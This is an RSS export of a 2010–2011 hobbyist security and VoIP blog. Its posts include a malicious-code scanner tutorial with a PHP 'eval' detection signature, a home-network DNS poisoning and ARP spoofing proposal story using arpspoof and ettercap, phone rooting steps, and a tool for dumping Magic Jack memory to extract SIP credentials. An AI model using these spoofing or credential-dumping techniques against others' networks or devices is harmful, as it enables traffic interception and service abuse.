<p>To resolve the first issue I used the ruby module Hawler and a modified version of htmap created by John Hart of Spoofed.org. This allowed me to get an index of all links that are linked to on the URL you want to scan. Once I had that information I was able to create a simple shell script to loop through the list scanning each page. I even went as far as to only output the infected pages into a report for easy reference.</p>
<p>To resolve the second issue I created my own database based on information I found on the internet and from personal research. I found using a web tool like Rubular, <a href="http://www.rubular.com/">http://www.rubular.com/</a> great for testing my regex strings.  We also are experimenting with downloading known malicious URL lists and auto creating signatures to use in the scans. We will be releasing this code in our next article.</p>
<p>For testing purposes we created the following signature and added it to the database:</p>
<p>a)      &#8212; 9.3</p>
<p>b)       - (eval)</p>
<p>c)       &#8211; PHP &#8216;eval&#8217; functions detected, possible encoded malicious code.</p>
<p>d)      &#8211; MU:RE</p>
<p>&nbsp;</p>
<ul>
<li>Bullet (a) is he signature number; this should be unique for your reporting.</li>
<li>Bullet (b) is the regex string. The regex string is encapsulated in ()</li>
<li>Bullet (c) is a comment about the malicious code.</li>
<li>Bullet (d) tells the app to scan multiple lines to match the regex and to also check when remotely scanning</li>
</ul>
<p>For more information of the creation of custom signature files check out the README file that comes with iScanner it is extremely easy to follow.</p>
<p><strong>So let’s take a look how to install all of this and how to use iScan script:</strong></p>
<p>1.       Make sure you are running linux and have ruby installed or the ability to install ruby.</p>
<p>2.       Install the Hawler ruby gem: gem install &#8211;source <a href="http://spoofed.org/files/hawler/">http://spoofed.org/files/hawler/</a> if any dependencies are needed make sure you install them as well.</p>
<p>3.       Download the modified version of htmp and iscan.sh (found in the zip file with the rest of the scripts from this article).<a title="http://www.digitaloffensive.com/files/iscan.zip" href="http://www.digitaloffensive.com/files/iscan.zip" target="_blank">http://www.digitaloffensive.com/files/iscan.zip</a></p>
<p><cite>4. </cite>Download iScanner from: <a href="http://iscanner.isecur1ty.org/">http://iscanner.isecur1ty.org</a><cite></cite></p>
<p><cite>5. </cite><cite>Uncompress iScanner and run the installer.</cite><cite></cite></p>
<p>6.       Copy iscan.sh to the directory you want to run it from and edit the variables to suit your need.</p>
<p>7.       chmod 777 iscan.sh and run it by typing ./iscan.sh and follow the onscreen directions.</p>
<p>a.       Using the Hawler gem and the modified htmap you will be able to scan all links on the url you enter as well as set how deep you want to crawl. Remember the deeper the longer it will take.</p>
<p><strong>Now that we have all the tools we need let’s create a test environment:</strong></p>
<p>1.       You will need a website for this to work. If you do not have one you can install and run apache on the Linux box that you are working on to use this script.</p>
<p>2.       Create a index page in the root of the web directory with a single href code to test.html</p>
<p>3.       Create another file called test.html and put the word eval in it and anything else you want.</p>
<p>4.       Put my test signature in the signature database and save.</p>
<p>5.       Run the iScan script and follow prompts.</p>
<p>a.       You will be first prompted for the URL. Use the full domain or the IP here. IE <a href="http://www.domain.com/">www.domain.com</a>, domain.com, or 127.0.0.1 avoid using /.</p>
<p>b.      Enter the depth you want to scan. Since this is a test set it to 1</p>
<p>c.       Sit back and watch</p>
<p>This script is pretty basic we are working on making reporting better as well as adding the ability to grab known malicious url black lists and hopefully know malicious code samples and increasing the signature database. The only current down side we see in the iScanner app after using our script is the lack to scan for malicious code in a database.</p>
<p>If you have comments or questions let me know.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2011%2F03%2Fdetecting-malicious-code-in-webpages-iscanner-and-iscan-script%2F&amp;title=Detecting%20malicious%20code%20in%20webpages%20iScanner%20and%20iScan%20Script" id="wpa2a_30"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2011/03/detecting-malicious-code-in-webpages-iscanner-and-iscan-script/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>A Hacker&#8217;s Proposal</title>
		<link>http://www.digitaloffensive.com/2011/03/a-hackers-proposal/</link>
		<comments>http://www.digitaloffensive.com/2011/03/a-hackers-proposal/#comments</comments>
		<pubDate>Thu, 03 Mar 2011 20:09:35 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=322</guid>
		<description><![CDATA[A Hacker’s Proposal: A little over two years ago I met the girl of my life, not knowing at the time she would one day be my wife. Social Engineering: The Ring One day while out shopping she found the ring she would later on wear. The only issue I had was it was more [...]]]></description>
			<content:encoded><![CDATA[<p><strong>A Hacker’s Proposal:</strong></p>
<p>A little over two years ago I met the girl of my life, not knowing at the time she would one day be my wife.</p>
<p><strong>Social Engineering: The Ring</strong></p>
<p>One day while out shopping she found the ring she would later on wear. The only issue I had was it was more then what I planned on. Though how could you say no to the one you love. I did not let her know at the time and continued to ask what she thought of other rings making sure her heart was definitely set on that one.<br />
Then one evening as I was getting ready to leave work I called her letting her know I was going to stop at the store to get some water. She told me since I did not feel well that she would stop at the store for me and meet me at home. I figured this be the best opportunity to surprise her. Though I was super ill I ran to the store and bought the ring knowing that she would stop by there on the way to get the water to look at it like she normally did. I got to the store and purchased the ring to find that this is a one of a kind ring with no others available like it from that store. Nor did any other stores have one. I spent the last several months visiting jewelers showing them pictures of the ring and asking if they had one like it, all of them were amazed by the design. Once I heard this I knew she would call me tonight to let me know that the ring was gone. Like clockwork the call came through and you can hear the disappointment in her voice.</p>
<p>Phase 1 was completed she had no idea that I bought it for her or what was to come.</p>
<p><strong>DNS Poisoning  and ARP Spoofing: The Proposal</strong></p>
<p>Before continuing to read, for those non technical people out there or in the event that the owner of Hip2Save ever reads this, <span style="color: #ff0000;"><strong>NOTHING </strong></span>malicious was done to their site and all the below took place on my own personal network using our own personal equipment.</p>
<p>What is a better way to say I love you then poisoning the one’s you love DNS to send her to a false site that looks like the original site but has a personal deal, poem and directions. I decided to use the site www.hip2save.com. The site offers daily deals and she loves to visit the site and get free / discounted products, I know we will have to work on her giving away her info so freely. I used wget –m to download a mirrored copy of their site to my apache directory on my backtrack box and altered the page to look like the below image:</p>
<p><a href="http://www.digitaloffensive.com/wp-content/uploads/2011/03/proposal.jpg"><img class="aligncenter size-medium wp-image-323" title="proposal" src="http://www.digitaloffensive.com/wp-content/uploads/2011/03/proposal-292x300.jpg" alt="" width="292" height="300" /></a></p>
<p>That was the easy part. The next part was carrying out the actual spoof and poisoning. Remember it is a race condition to see what DNS server answers first. So I cheated here and set my firewall to my malicious DNS server that I installed on my backtrack so I knew I would win. When I think about it, it would have been easier to setup my own zones for the sites I wanted to hijack, but where would the challenge be there. With that in place I used Dsniff’s arpspoof to take care of the arp s this did not take out my wireless switch like ettercap did. Then I used ettercap –T –q –P dns_spoof (after editing the etter.dns file of course). I also enabled IP forwarding so the packets could be forwarded out and I used my DNS server to handle all the non hijacked sites. The above took several days of testing and researching before I knew without a doubt that it would all work.</p>
<p><strong>Exploitation: Popping the question</strong></p>
<p>Several hours after she got home from work we were both sitting on the couches watching TV and surfing the net when she said “what is this” and started to cry (Happy tears). I was like what’s wrong as I got off the couch and approached her to see what she was talking about (already knowing).  I pulled the ring out and asked her to marry me while getting down on one knee.<br />
She said: Yes and was extremely impressed with my idea for the proposal and even though she doesn’t know anything about hacking she asked that I explain to her how I did it.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2011%2F03%2Fa-hackers-proposal%2F&amp;title=A%20Hacker%E2%80%99s%20Proposal" id="wpa2a_32"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2011/03/a-hackers-proposal/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to root the Droid version 2.3 code</title>
		<link>http://www.digitaloffensive.com/2010/12/how-to-root-the-droid-version-2-3-code/</link>
		<comments>http://www.digitaloffensive.com/2010/12/how-to-root-the-droid-version-2-3-code/#comments</comments>
		<pubDate>Fri, 17 Dec 2010 04:51:50 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=318</guid>
		<description><![CDATA[How to root the Droid version 2.3 code Tonight I got an OTA (over the air update) from code 2.1 to 2.3 and wouldn’t you know it broke my existing root. You would figure since rooting is now legal they would not touch files that don’t belong to them or change your security settings but [...]]]></description>
			<content:encoded><![CDATA[<p><strong>How to root the Droid version 2.3 code</strong></p>
<p>Tonight I got an OTA (over the air update) from code 2.1 to 2.3 and wouldn’t you know it broke my existing root.  You would figure since rooting is now legal they would not touch files that don’t belong to them or change your security settings but they do. So a quick Google lead me to Z4Root, unfortunately it has been removed from the market place but it can be downloaded from http://www.droid-life.com/2010/12/09/z4root-will-root-the-droid-x-2-3-340-update/ .  </p>
<p>Once you download the file follow these easy steps to get root back or get root for the first time.</p>
<p>1.	Connect the phone to the USB of your computer and choose mass storage mode.<br />
2.	Copy the file to the root of the SD card<br />
3.	Unplug the phone and let the SD card become ready<br />
4.	Use the files app to browse the Phone files and locate z4root.1.3.0.apk<br />
5.	Click on z4root.1.3.0.apk you will be prompted with a security warning that you can’t run applications from a non-market source. Simply change that setting when the setup brings you to that screen<br />
6.	Next you will need to enable USB debugging.<br />
7.	Once you enable USB debugging re-run the app and overwrite the existing configuration<br />
8.	Click on permanent root and be patient.<br />
9.	Once done your phone will reboot and you now have root.</p>
<p>With root you can run apps like barnacle a free wifi tether app that I think is better than the tether app. Also you can run apps like shark (wire shark for the droid) and many other cool apps that Verizon does not want you to run.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F12%2Fhow-to-root-the-droid-version-2-3-code%2F&amp;title=How%20to%20root%20the%20Droid%20version%202.3%20code" id="wpa2a_34"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/12/how-to-root-the-droid-version-2-3-code/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Free Phone Service</title>
		<link>http://www.digitaloffensive.com/2010/12/free-phone-service/</link>
		<comments>http://www.digitaloffensive.com/2010/12/free-phone-service/#comments</comments>
		<pubDate>Wed, 08 Dec 2010 03:20:17 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=316</guid>
		<description><![CDATA[VoIP My Way is offering free VoIP phone service. There is no cost and they provide you with your SIP credentials so there is no hacking involved. Head over to http://www.voipmyway.com to sign up now and start placing free calls.]]></description>
			<content:encoded><![CDATA[<p>VoIP My Way is offering free VoIP phone service. There is no cost and they provide you with your SIP credentials so there is no hacking involved. Head over to <a href="http://www.voipmyway.com">http://www.voipmyway.com</a> to sign up now and start placing free calls.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F12%2Ffree-phone-service%2F&amp;title=Free%20Phone%20Service" id="wpa2a_36"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/12/free-phone-service/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Magic Jack replacement</title>
		<link>http://www.digitaloffensive.com/2010/12/magic-jack-replacement/</link>
		<comments>http://www.digitaloffensive.com/2010/12/magic-jack-replacement/#comments</comments>
		<pubDate>Fri, 03 Dec 2010 15:35:33 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=311</guid>
		<description><![CDATA[With the end of Magic Jack being able to be hacked to use on any SIP device such as in Asterisk, an ATA or x-lite we have formed a sister company VoIP My Way. We are offering open SIP service. The service includes a web based portal to manage your account, SIP credentials, E911, unlimited [...]]]></description>
			<content:encoded><![CDATA[<p>With the end of Magic Jack being able to be hacked to use on any SIP device such as in Asterisk, an ATA or x-lite we have formed a sister company VoIP My Way. We are offering open SIP service. The service includes a web based portal to manage your account, SIP credentials, E911, unlimited channels, 1 local number, 1000 minutes of US and Canada calling a month, free support and so much more. We are currently offering our readers of Digital Offensive a special 1 year pricing of 85.00 and free account setup. That is less than 8.00 a month, the cost of one stop at McDonalds or any other fast food place. For this amount you are guaranteed stress free open SIP phone service.</p>
<p>To purchase this service click the buy it now button. In the comments put you’re State, City and Area code so we can give you a list of numbers available in your area. I there is no numbers available in your area (highly unlikely) we will refund you your money or find one closer to you. You can try the service for 90 days and if you don’t like it cancel it any time with in the first 90 days and you will be only charged for the minutes used, phone number, E911 and taxes.</p>
<p>Accounts can take up to 24 hours to setup and verify the buyer. You will need to fax a signed contract and TOS agreement back to us.</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
<input type="hidden" name="hosted_button_id" value="ZP3VTVFV9QUV8">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_subscribeCC_LG.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
<img alt="" border="0" src="https://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="1"><br />
</form>
<p>If you are a pen tester and want to do war dialing contact us for a special deal on using our service with warvox.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F12%2Fmagic-jack-replacement%2F&amp;title=Magic%20Jack%20replacement" id="wpa2a_38"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/12/magic-jack-replacement/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>My Home Office VoIP PBX Setup</title>
		<link>http://www.digitaloffensive.com/2010/11/my-home-office-voip-pbx-setup/</link>
		<comments>http://www.digitaloffensive.com/2010/11/my-home-office-voip-pbx-setup/#comments</comments>
		<pubDate>Mon, 08 Nov 2010 14:39:54 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=307</guid>
		<description><![CDATA[My Home Office VoIP PBX Setup I figured it was about time that I showed what I have setup in my home for a phone system. This is only the start as new products come in and as budget allows we like to purchase new items to see how we can tie them into the [...]]]></description>
			<content:encoded><![CDATA[<p>My Home Office VoIP PBX Setup</p>
<p>I figured it was about time that I showed what I have setup in my home for a phone system. This is only the start as new products come in and as budget allows we like to purchase new items to see how we can tie them into the system.</p>
<p>Our current wish list includes an IP based Door Phone / Bell. There are a few on the market but the price tags run from 150 to over 1,000 dollars.</p>
<p>Currently on our home phone system we are using our own VoIP service from our spin off company called VoIP My Way (<a href="http://www.voipmyway.com" target="_blank">http://www.voipmyway.com</a>), which is fully up and running but we are currently working on pricing and a website. Our current thought process is to offer it like Magic Jack does with a mixture of what Whistle phone does. Basically for a low monthly fee you can have unlimited* calling to the US and Canada and basically won’t need any dongle. To help offset costs we are going to play a 15 to 20 second ad on all outbound calls. Ad free plans will be available as well.  At home we also use whistle phone as a backup trunk and for long calls to save costs.</p>
<p><span id="more-307"></span></p>
<p>We use to run a Magic Jack trunk on there as well but do to the recent changes we are still investigating how to get it to work again. For now it is disabled and the number forwards to our new number. Guess who will not be renewing with Magic Jack this coming year.</p>
<p>Our system currently runs on a Gateway Desktop computer that has 2 TB of space, 2 Gig of ram and a P4 3.8 processor, though the actual PBX runs in VMware Server on that desktop. The desktop also serves as our streaming media server, file server and general internet surfing. The VMware instance of our PBX is running PBX in a Flash, which is basically a modified version of CentOS, Asterisk and FreePBX compiled together into quick and easy to install PBX system. The VMware instance is configured with 20 gigabytes of hard drive space, 512 MB of memory and bridged networking. This setup currently supports anywhere from 1 caller up to 5 callers at any given time. Our biggest issue becomes bandwidth, depending what the kids are doing or I am downloading.</p>
<p>The PBX in a Flash and the firewall has been configured to work with NAT as described in our article located here:<a href="http://www.digitaloffensive.com/2010/05/overcoming-sip-over-nat/" target="_blank"> http://www.digitaloffensive.com/2010/05/overcoming-sip-over-nat/</a></p>
<p>For testing and daily use we have several types of phones tied into the system. The Cisco 7940 is automatically configured via a config file it pulls down from the TFTP server that runs on the PBX. The Android phone is a Motorola Droid X, it is running the newest version of SIPdroid that allows it use either 3G or WIFI to connect to the PBX to send and receive calls.  The laptop is running X-lite from Counter Path. On the laptop I also have my Bluetooth head set tied into it so I can talk as I work. Finally what I consider to be the cherry on top is the Linksys SIPura 2100. I spent a lot of time looking for a cheap way to tie my analog phones into my VoIP based PBX. Originally when I ran the PBX on its own hardware I was looking at purchasing a FXS card but for a good card with good call quality you were looking at over 100 + dollars.  That is what got me thinking about using an ATA to connect the phones to the VoIP PBX. After a few hours of eBay I got myself the Linksys SIPura for $10.00 and the rest of that story can be read in our upcoming article on how to configure the ATA to work on Asterisk. The ATA allows me to plug one line into my homes phone outlet to connect the phones in all the rooms. The other port we use for faxing.</p>
<p><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/11/system.gif"><img class="aligncenter size-medium wp-image-308" title="system" src="http://www.digitaloffensive.com/wp-content/uploads/2010/11/system-300x224.gif" alt="" width="300" height="224" /></a></p>
<p>As always if you have any questions or comments let us know.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F11%2Fmy-home-office-voip-pbx-setup%2F&amp;title=My%20Home%20Office%20VoIP%20PBX%20Setup" id="wpa2a_40"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/11/my-home-office-voip-pbx-setup/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Google Voice and Whistle Phone for free calls and a local DID on any SIP device</title>
		<link>http://www.digitaloffensive.com/2010/11/google-voice-and-whistle-phone-for-free-calls-and-a-local-did-on-any-sip-device/</link>
		<comments>http://www.digitaloffensive.com/2010/11/google-voice-and-whistle-phone-for-free-calls-and-a-local-did-on-any-sip-device/#comments</comments>
		<pubDate>Tue, 02 Nov 2010 12:51:00 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=301</guid>
		<description><![CDATA[Google Voice and Whistle Phone for free calls and a local DID on any SIP device With the latest round of rotating passwords from Magic Jack and no end in sight many are looking for other alternatives. I for one have started my own VoIP service after years of providing VoIP consulting services. I wanted [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Google Voice and Whistle Phone for free calls and a local DID on any SIP device</strong></p>
<p>With the latest round of rotating passwords from Magic Jack and no end in sight many are looking for other alternatives. I for one have started my own VoIP service after years of providing VoIP consulting services. I wanted something reliable. Though there are those out there that still want free solutions.</p>
<p><span id="more-301"></span></p>
<p>Whistle phone provides free phone service for those that are willing to listen to a 15 second commercial on every outbound call. To sign up for their service you must go to their site and download their client. Once you have downloaded and installed the client you will be able to register for their service. Make sure you register for the free service.</p>
<p>Once that is done you will now have all the SIP information you will need:</p>
<ul>
<li>Username is your 10 digit number with no dashes</li>
<li>Password is the password you created for the account</li>
<li>The SIP proxy is proxy.whistlephone.com</li>
</ul>
<p>At this point you will have noticed that you do not have a local DID so this is where Google Voice comes into play: <a href="http://www.google.com/voice">http://www.google.com/voice</a>. Go the site and sign up for an account. You will need to have a phone that they can call and give you a registration code to complete the registration process.</p>
<p>I suggest signing in to your whistle phone and using that number in the registration process as we will be eventually pointing your Google Voice number to your whistle phone number so you will have a free local DID.</p>
<p>At this point you are ready to receive calls from your local DID and be able to place calls from you Whistle phone or whatever device you want to using your SIP credentials.</p>
<p>If you are using Asterisk with FreePBX here are the trunk settings you will need:</p>
<p><strong>UPDATE THANKS TO VANHAM: (NEW TRUNK INFO)</strong><br />
The following are the settings I am currently using:<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Maximum Channels: 4</p>
<p>Trunk Name: whistle</p>
<p>PEER Details:</p>
<p>host=proxy.whistlephone.com<br />
useragent=Whistle/Windows 1.20 (VailSIP 20100330)<br />
type=peer<br />
username=YOURDID<br />
fromuser=YOURDID<br />
defaultuser=YOURDID<br />
secret=YOURSECRET<br />
insecure=port,invite<br />
nat=yes<br />
qualify=2000<br />
disallow=all<br />
allow=ulaw<br />
dtmfmode=rfc2833<br />
defaultexpiry=60</p>
<p>USER Context: YOURDID</p>
<p>USER Details:</p>
<p>host=proxy2.whistlephone.com<br />
useragent=Whistle/Windows 1.20 (VailSIP 20100330)<br />
type=friend&amp;friend<br />
username=YOURDID<br />
fromuser=YOURDID<br />
defaultuser=YOURDID<br />
secret=YOURSECRET<br />
insecure=port,invite<br />
nat=yes<br />
qualify=2000<br />
disallow=all<br />
allow=ulaw<br />
context=from-trunk-sip-whistle</p>
<p>Register String:</p>
<p>YOURDID:YOURSECRET@proxy.whistlephone.com:5060/YOURDID</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Maximum Channels: 4</p>
<p>Trunk Name: whistle2</p>
<p>PEER Details:</p>
<p>host=proxy.whistlephone.com<br />
useragent=Whistle/Windows 1.20 (VailSIP 20100330)<br />
type=peer<br />
username=YOURDID<br />
fromuser=YOURDID<br />
defaultuser=YOURDID<br />
secret=YOURSECRET<br />
insecure=port,invite<br />
nat=yes<br />
qualify=2000<br />
disallow=all<br />
allow=ulaw<br />
dtmfmode=rfc2833<br />
defaultexpiry=60</p>
<p>USER Context: 1YOURDID</p>
<p>USER Details:</p>
<p>host=proxy2.whistlephone.com<br />
useragent=Whistle/Windows 1.20 (VailSIP 20100330)<br />
type=friend&amp;friend<br />
username=YOURDID<br />
fromuser=YOURDID<br />
defaultuser=YOURDID<br />
secret=YOURSECRET<br />
insecure=port,invite<br />
nat=yes<br />
qualify=2000<br />
disallow=all<br />
allow=ulaw<br />
context=from-trunk-sip-whistle</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F11%2Fgoogle-voice-and-whistle-phone-for-free-calls-and-a-local-did-on-any-sip-device%2F&amp;title=Google%20Voice%20and%20Whistle%20Phone%20for%20free%20calls%20and%20a%20local%20DID%20on%20any%20SIP%20device" id="wpa2a_42"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/11/google-voice-and-whistle-phone-for-free-calls-and-a-local-did-on-any-sip-device/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Magic Jack and the rotating password round 2</title>
		<link>http://www.digitaloffensive.com/2010/10/magic-jack-and-the-rotating-password-round-2/</link>
		<comments>http://www.digitaloffensive.com/2010/10/magic-jack-and-the-rotating-password-round-2/#comments</comments>
		<pubDate>Mon, 25 Oct 2010 12:19:40 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=298</guid>
		<description><![CDATA[Some time this weekend Magic Jack release another update to the system that now has the SIP passwords rotating again. We discovered this early this morning and have not had the time to fully research this as of yet. Please stay tune for updates. Side note for the Magic Jack staff that I know visit [...]]]></description>
			<content:encoded><![CDATA[<p>Some time this weekend Magic Jack release another update to the system that now has the SIP passwords rotating again. We discovered this early this morning and have not had the time to fully research this as of yet. Please stay tune for updates.</p>
<p>Side note for the Magic Jack staff that I know visit the site, if you would just provide the SIP to us even if you charged 10 dollars more a year and no support for bring in your own device then we would not have to write these tools and you can make more money off of us.</p>
<p>Thanks</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F10%2Fmagic-jack-and-the-rotating-password-round-2%2F&amp;title=Magic%20Jack%20and%20the%20rotating%20password%20round%202" id="wpa2a_44"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/10/magic-jack-and-the-rotating-password-round-2/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>MJSIP version 2.0 Beta: Automating the Magic Jack SIP retrieval</title>
		<link>http://www.digitaloffensive.com/2010/10/mjsip-version-2-0-beta-automating-the-magic-jack-sip-retrieval/</link>
		<comments>http://www.digitaloffensive.com/2010/10/mjsip-version-2-0-beta-automating-the-magic-jack-sip-retrieval/#comments</comments>
		<pubDate>Fri, 22 Oct 2010 16:44:47 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=293</guid>
		<description><![CDATA[MJSIP version 2.0 Beta: Automating the Magic Jack SIP retrieval What is MJSIP version 2.0 beta: After a very successful following our first version and recent changes to how Magic Jack is handling passwords and usernames we have decided to update our script with additional filters and added the ability to find your username as [...]]]></description>
			<content:encoded><![CDATA[<p><strong>MJSIP version 2.0 Beta: <strong>Automating the Magic Jack SIP retrieval</strong></strong></p>
<p><strong>What is MJSIP version 2.0 beta:</strong></p>
<p>After a very successful following our first version and recent changes to how Magic Jack is handling passwords and usernames we have decided to update our script with additional filters and added the ability to find your username as well since it is not always E_number_01.</p>
<p><span id="more-293"></span></p>
<p><strong>What is new and why is this called beta:</strong></p>
<p>Though we have tested this on over 40 + jacks from 10/20/2010 to as recently as of today we are have not allowed the general public to try it until now. That is why it is called beta. This version now includes the ability to retrieve your username.</p>
<p><strong><span style="text-decoration: underline;">What is required:</span></strong></p>
<p><strong>MJSIP: </strong>Our Perl script. This can be downloaded here: <a href="http://www.digitaloffensive.com/mj/mjsip2.zip" target="_blank">http://www.digitaloffensive.com/mj/mjsip2.zip</a>. If you have our older ne overwrite it with this one.</p>
<p><strong>SIPDump: </strong>Magic Jack stores all your SIP information in the programs memory during the startup process. SIPDump is a modified version of MemDump, which was originally developed by Stroth. You can download this tool here: <a href="http://www.digitaloffensive.com/mj/mj.rar" target="_blank">http://www.digitaloffensive.com/mj/mj.rar</a></p>
<p><strong>Active Perl:</strong> This is a free windows port of the Perl interpreter. It can be downloaded her for the 32 bit or 64 bit processor: <a href="http://www.activestate.com/activeperl/downloads">http://www.activestate.com/activeperl/downloads</a>. Download the msi file and install it, choose all the defaults.</p>
<p><strong><span style="text-decoration: underline;">How to use it:</span></strong></p>
<p><strong>Step 1: </strong>Download and extract all your tools to a folder on your system. Working out of one folder will make life so much easier.</p>
<p><strong>Step 2: </strong>Use SIPDump.exe to dump the Memory of your Magic Jack. If you need more details on how to do this check out my article on this located here: <a href="http://www.digitaloffensive.com/2010/03/hacking-the-magic-jack-in-2010-for-use-on-trixbox-or-any-other-sip-device/" target="_blank">http://www.digitaloffensive.com/2010/03/hacking-the-magic-jack-in-2010-for-use-on-trixbox-or-any-other-sip-device/</a></p>
<p><strong>Step3: </strong>Out of all the Magic Jack’s we have tested the 3<sup>rd</sup> dump file was the most reliable at containing the password. I would strongly suggest you do not change that line in the MJSIP.pl file.</p>
<p><strong>Step 4: </strong>Open a command prompt and navigate to the folder that you created that has all your tools in it. This folder should also contain you SIPDump files, unless you did not listen to my suggestions above. Once in that folder type the following command “perl mjsip.pl” This should dump your password and username to the screen.</p>
<p style="text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/10/mjsip2.jpg"><img class="aligncenter size-medium wp-image-294" title="mjsip2" src="http://www.digitaloffensive.com/wp-content/uploads/2010/10/mjsip2-300x108.jpg" alt="" width="300" height="108" /></a></p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F10%2Fmjsip-version-2-0-beta-automating-the-magic-jack-sip-retrieval%2F&amp;title=MJSIP%20version%202.0%20Beta%3A%20Automating%20the%20Magic%20Jack%20SIP%20retrieval" id="wpa2a_46"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/10/mjsip-version-2-0-beta-automating-the-magic-jack-sip-retrieval/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>SIPBAN for APF</title>
		<link>http://www.digitaloffensive.com/2010/10/sipban-for-apf/</link>
		<comments>http://www.digitaloffensive.com/2010/10/sipban-for-apf/#comments</comments>
		<pubDate>Tue, 19 Oct 2010 23:53:22 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
